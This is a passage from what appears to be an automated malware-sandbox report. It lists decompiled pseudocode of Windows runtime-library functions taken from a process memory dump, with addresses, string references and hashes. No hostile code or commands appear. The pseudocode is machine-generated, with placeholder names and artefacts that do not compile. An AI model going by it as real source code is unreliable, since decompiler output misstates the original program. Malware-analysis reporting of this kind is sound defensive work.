							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4ba5350;
							if(_t109 != 0x4ba5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E04B4FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04B45720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x04ab2d8a
0x04ab2d8a
0x04ab2d92
0x04ab2d96
0x04ab2d9e
0x04ab2da0
0x04ab2da3
0x04ab2da5
0x04ab2da8
0x04ab2dab
0x04ab2db2
0x04b0f9aa
0x04b0f9ab
0x04b0f9ae
0x04b0f9ae
0x04ab2db8
0x04ab2dc2
0x04b0f9b9
0x04b0f9be
0x04b0f9bf
0x04b0f9bf
0x04ab2dcf
0x04b0f9c9
0x04ab2dd5
0x04ab2dd5
0x04ab2dd5
0x04ab2dde
0x04ab2de1
0x04ab2e70
0x04ab2e72
0x04ab2e72
0x04ab2de7
0x04ab2deb
0x04ab2e7c
0x04ab2e83
0x04ab2e85
0x04ab2e8b
0x04ab2e8d
0x04ab2e92
0x04ab2e92
0x04ab2e85
0x04ab2df1
0x04ab2df7
0x04ab2df9
0x04ab2df9
0x04ab2dfc
0x04ab2dff
0x04ab2e02
0x00000000
0x04ab2e05
0x04ab2e0c
0x04b0f9d9
0x04ab2e12
0x04ab2e12
0x04ab2e12
0x04ab2e1a
0x04b0f9e3
0x04b0f9e9
0x04b0f9f0
0x04b0f9f6
0x04b0f9f8
0x04b0f9f8
0x04b0f9f0
0x04ab2e23
0x04b0fa02
0x04b0fa03
0x04b0fa05
0x04b0fa06
0x00000000
0x04ab2e29
0x04ab2e29
0x04ab2e2e
0x04ab2e34
0x04ab2e3e
0x00000000
0x00000000
0x04ab2e44
0x04ab2e47
0x04ab2e4d
0x00000000
0x00000000
0x04ab2e4f
0x04ab2e54
0x00000000
0x00000000
0x04ab2e5a
0x04ab2e5f
0x04ab2e9a
0x04ab2ea4
0x04ab2ea5
0x04ab2ea8
0x04ab2eaf
0x04ab2eb2
0x04ab2eb5
0x04b0fae9
0x04b0faeb
0x04b0faed
0x04b0faef
0x04b0faf7
0x04b0faf8
0x04b0fafd
0x04b0faff
0x04b0fb04
0x04b0fb04
0x04b0faff
0x04ab2ec0
0x04ab2ec4
0x04ab2ec6
0x04ab2ec8
0x04b0fb14
0x04b0fb18
0x04b0fb1e
0x04b0fb21
0x04b0fb21
0x04ab2ece
0x04ab2ece
0x04ab2ece
0x04ab2ed7
0x04ab2e61
0x04ab2e63
0x04b0fa6b
0x04b0fa71
0x04b0fa76
0x04b0fa78
0x04b0fa8a
0x04b0fa7a
0x04b0fa83
0x04b0fa83
0x04b0fa8f
0x04b0fa91
0x04b0fa97
0x04b0fa9d
0x04b0faa4
0x04b0faaa
0x04b0faaf
0x04b0fab1
0x04b0fac3
0x04b0fab3
0x04b0fabc
0x04b0fabc
0x04b0fac8
0x04b0facb
0x04b0fadf
0x04b0fadf
0x04b0facb
0x04b0faa4
0x04b0fa91
0x04ab2e6f
0x04ab2e6f
0x04ab2e5f
0x04b0fa13
0x04b0fa15
0x04b0fa17
0x04b0fa1f
0x04b0fa21
0x04b0fa22
0x04b0fa25
0x04b0fa28
0x04b0fa2f
0x04b0fa2f
0x04b0fa2a
0x04b0fa2a
0x04b0fa2a
0x04b0fa31
0x04b0fa34
0x04b0fa36
0x04b0fa3c
0x04b0fa3e
0x04b0fa41
0x04b0fa43
0x04b0fa45
0x04b0fa45
0x04b0fa41
0x04b0fa3c
0x04b0fa4a
0x04b0fa4f
0x04b0fa51
0x04b0fa53
0x04b0fa56
0x04b0fa5b
0x04b0fa5e
0x00000000
0x04b0fa5e
0x04ab2e23

Strings

RTL: Re-Waiting, xrefs: 04B0FA4A

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 812c8c2149bdbe16dfaca066043cbb21285e62ffecb6c10f2d88b7d168c612c5
Instruction ID: d2033988420b080dd2bc202aeb7778fc0597c93cd42f70a0e4f9da5bc00bfa23
Opcode Fuzzy Hash: 812c8c2149bdbe16dfaca066043cbb21285e62ffecb6c10f2d88b7d168c612c5
Instruction Fuzzy Hash: A7613632B00604AFEB31DF68C848BBE7BB9EB44314F1486E6E491972D1D774B90187D1

Uniqueness

Uniqueness Score: -1.00%

Function 04B80EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04B80EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E04B7FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04B81074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04AF9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E04B7A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E04B7A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4ba8b04 >> 0x14) + (_v44 -  *0x4ba8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04AD7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E04B7138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04AD7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E04B6FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4ba8724 & 0x00000008) != 0) {
						E04B752F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E04B815B5(0x4ba8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x04b80eb7
0x04b80eb9
0x04b80ec0
0x04b80ec2
0x04b80ecd
0x04b8105b
0x04b8105b
0x04b81061
0x04b81066
0x04b81066
0x04b8106b
0x04b81073
0x04b81073
0x04b80ed3
0x04b80ed6
0x04b80edc
0x04b80ee0
0x04b80ee7
0x04b80ef0
0x04b80ef5
0x04b80efa
0x04b80efc
0x04b80efd
0x04b80f03
0x04b80f04
0x04b80f06
0x04b80f07
0x04b80f09
0x04b80f0e
0x04b80f14
0x04b80f23
0x04b80f2d
0x04b80f34
0x04b80f34
0x04b80f14
0x04b80f52
0x00000000
0x00000000
0x04b80f58
0x04b80f73
0x04b80f74
0x04b80f79
0x04b80f7d
0x04b80f80
0x04b80f86
0x04b80fab
0x04b80fb5
0x04b80fc6
0x04b80fd1
0x04b80fe3
0x04b80fd3
0x04b80fdc
0x04b80fdc
0x04b80feb
0x04b81009
0x04b81009
0x04b81015
0x04b81027
0x04b81017
0x04b81020
0x04b81020
0x04b8102f
0x04b8103c
0x04b8103c
0x04b81048
0x04b81050
0x04b81050
0x04b81055
0x00000000
0x04b81055
0x04b80f88
0x04b80f9e
0x04b80fa2
0x04b80fa9
0x00000000
0x00000000
0x00000000
0x04b80fa9
0x00000000

Strings

`, xrefs: 04B80F16

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 4900617944ef9d91b45143285203f638a99b254eb43ff9a82f4e3564ad2b5e5f
Instruction ID: 4a0cc1b6929f58ff0c471366fd8e74e145c04ce666bc0d8ea121bc65183df287
Opcode Fuzzy Hash: 4900617944ef9d91b45143285203f638a99b254eb43ff9a82f4e3564ad2b5e5f
Instruction Fuzzy Hash: 9151DF702043429FE725EF28D880B2BB7E5EBC4344F0449ADF99697291D730F80ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 04AEF0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04AEF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04AD4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04AF9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04AF9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E04AF95D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x952cd01a
							_t109 = L04AD4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000952c
								E04AFF3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000952c
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E04AF95D0();
										L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x04aef0d3
0x04aef0d9
0x04aef0e0
0x04aef0e7
0x04aef0f2
0x04aef0f4
0x04aef0f8
0x04aef100
0x04aef108
0x04aef10d
0x04aef115
0x04aef116
0x04aef11f
0x04aef123
0x04aef124
0x04aef12c
0x04aef130
0x04aef134
0x04aef13d
0x04aef144
0x04aef14b
0x04aef152
0x04b2bab0
0x04b2bab0
0x04aef158
0x04aef158
0x04aef15a
0x04aef160
0x04aef165
0x04aef166
0x04aef16f
0x04aef173
0x04b2baa7
0x04b2baa7
0x04b2baab
0x00000000
0x04aef179
0x04aef179
0x04aef18d
0x04aef191
0x04b2baa2
0x00000000
0x04aef197
0x04aef19b
0x04aef1a2
0x04aef1a9
0x04aef1af
0x04aef1b2
0x04aef1b6
0x04aef1b9
0x04aef1c0
0x04aef1c4
0x04aef1d8
0x04aef1df
0x04aef1e3
0x04aef1e6
0x04aef1eb
0x04aef1ee
0x04aef1f4
0x04aef20f
0x04b2bab7
0x04b2babb
0x04b2bacc
0x04b2bad1
0x04aef215
0x04aef218
0x04aef226
0x04aef22b
0x00000000
0x04aef22b
0x04aef1f6
0x04aef1f6
0x04aef1f9
0x04aef1fb
0x04aef1fb
0x04aef1f4
0x04aef191
0x04aef173
0x04aef152
0x04aef203

Strings

@, xrefs: 04AEF124

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 7c1586c70fc8b804a636630767f6269b3167a750c3c3cc32daff31df140c11fa
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 58518F71505710AFD320DF59C940A67BBF8FF48714F00892EFAA587650EB74E904CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04B33540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04B33540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x4bad360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04AF0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04B33706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E04AFFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04B33540;
						E04AFFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E04B0DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04B40C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E04AF97C0();
					}
					return E04AFB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04B33971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04B33884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E04AFFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04AF9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04B33787(_a4,  &_v352, _t80);
						}
					}
					L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E04AF95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x04b33552
0x04b3355a
0x04b3355d
0x04b33566
0x04b33567
0x04b3357e
0x04b3358f
0x04b335a1
0x04b335a5
0x04b3366b
0x04b3366b
0x04b3366d
0x04b33672
0x04b33679
0x04b33685
0x04b3368d
0x04b3369d
0x04b336a7
0x04b336b8
0x04b336c6
0x04b336c7
0x04b336dc
0x04b336e1
0x04b336e7
0x04b336e9
0x04b336e9
0x04b33703
0x04b33703
0x04b335b5
0x04b335c0
0x04b335c4
0x00000000
0x00000000
0x04b335ca
0x04b335d7
0x04b335e2
0x04b335e6
0x04b335e8
0x04b335f5
0x04b335fa
0x04b33603
0x04b33604
0x04b33609
0x04b3360a
0x04b33612
0x04b33613
0x04b3361e
0x04b33622
0x04b33628
0x04b3362f
0x04b3362f
0x04b33636
0x04b33638
0x04b3363b
0x04b33642
0x04b33642
0x04b33636
0x04b33657
0x04b33657
0x04b3365c
0x04b33662
0x04b33669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 04B3358F

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: 2b8add22f1b2fdded52296634635957f067666987b539b6a72b3adc8487d49f4
Instruction ID: 597db4c55d91b9548382a1adb49e6e9e67442df725ed78ed591b3e32de70aedd
Opcode Fuzzy Hash: 2b8add22f1b2fdded52296634635957f067666987b539b6a72b3adc8487d49f4
Instruction Fuzzy Hash: BB4114B1D0452C9EEF219A51DD81F9FB77CAB44719F0045D5AA19A7240DB30AE888F94

Uniqueness

Uniqueness Score: -1.00%

Function 04B805AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E04B805AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E04B807DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E04AF9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E04B7A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E04B7A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E04B81293(_t79, _v40, E04B807DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E04AD7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E04B7138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x04b805c5
0x04b805ca
0x04b805d3
0x04b806db
0x04b806db
0x04b806dd
0x04b806e3
0x04b806e3
0x04b805dd
0x04b805e7
0x04b805f6
0x04b80600
0x04b80607
0x04b80610
0x04b80615
0x04b8061a
0x04b8061c
0x04b8061e
0x04b80624
0x04b80625
0x04b80627
0x04b80628
0x04b80631
0x04b80640
0x04b8064d
0x04b80654
0x04b80654
0x04b80631
0x04b8066d
0x04b80674
0x00000000
0x00000000
0x04b80692
0x04b8069e
0x04b806b0
0x04b806a0
0x04b806a9
0x04b806a9
0x04b806b8
0x04b806d6
0x04b806d6
0x00000000

Strings

`, xrefs: 04B80633

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 4409072256305ea044e69f6e40a998a3e90c6ddd94b3b8b58f8a7f8b14a48625
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: BC31E4327047456BE720EE24CD45F9B77D9EBC4798F054269F954AB280D770F908CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04B33884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04B33884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04AF9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04AD4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04AF9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x04b33893
0x04b33896
0x04b33899
0x04b3389f
0x04b338a0
0x04b338a4
0x04b338a9
0x04b338ac
0x04b338ad
0x04b338ae
0x04b338af
0x04b338b1
0x04b338b4
0x04b338bb
0x04b338bc
0x04b338bd
0x04b338c4
0x04b338c8
0x04b338ca
0x04b338ca
0x04b338d5
0x04b3393e
0x04b33940
0x04b33942
0x04b33952
0x04b33954
0x04b33961
0x04b33961
0x04b33967
0x04b3396e
0x04b3396e
0x04b33947
0x04b3394c
0x00000000
0x04b3394c
0x04b338ea
0x04b338ee
0x04b338f8
0x04b338f9
0x04b338ff
0x04b33900
0x04b33902
0x04b33903
0x04b3390b
0x04b3390f
0x04b33950
0x00000000
0x04b33950
0x04b33915
0x04b3391d
0x04b3391d
0x04b33922
0x04b33926
0x00000000
0x04b33928
0x04b3392b
0x04b3392b
0x04b33935
0x04b33937
0x04b33937
0x00000000
0x04b33935
0x04b33926
0x04b338f0
0x00000000

Strings

BinaryName, xrefs: 04B338B4

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: edebf78f976b8b8a14d5a7bce9a8d8c55a153cae057db428ab20fa06464cb4e5
Instruction ID: e1ab16d986e6f8ad2bc5da4fd341f855397f36e174360c5c15b143612ef95c08
Opcode Fuzzy Hash: edebf78f976b8b8a14d5a7bce9a8d8c55a153cae057db428ab20fa06464cb4e5
Instruction Fuzzy Hash: 47310572D00509FFEB25DA5AC945E6BF7B4EB90724F0142A9ED16A7650D730BE00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04AED294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E04AED294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4bad360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04AD4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E04AFB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E04AF98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E04AF95D0();
					L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x04aed29c
0x04aed2a6
0x04aed2b1
0x04aed2b5
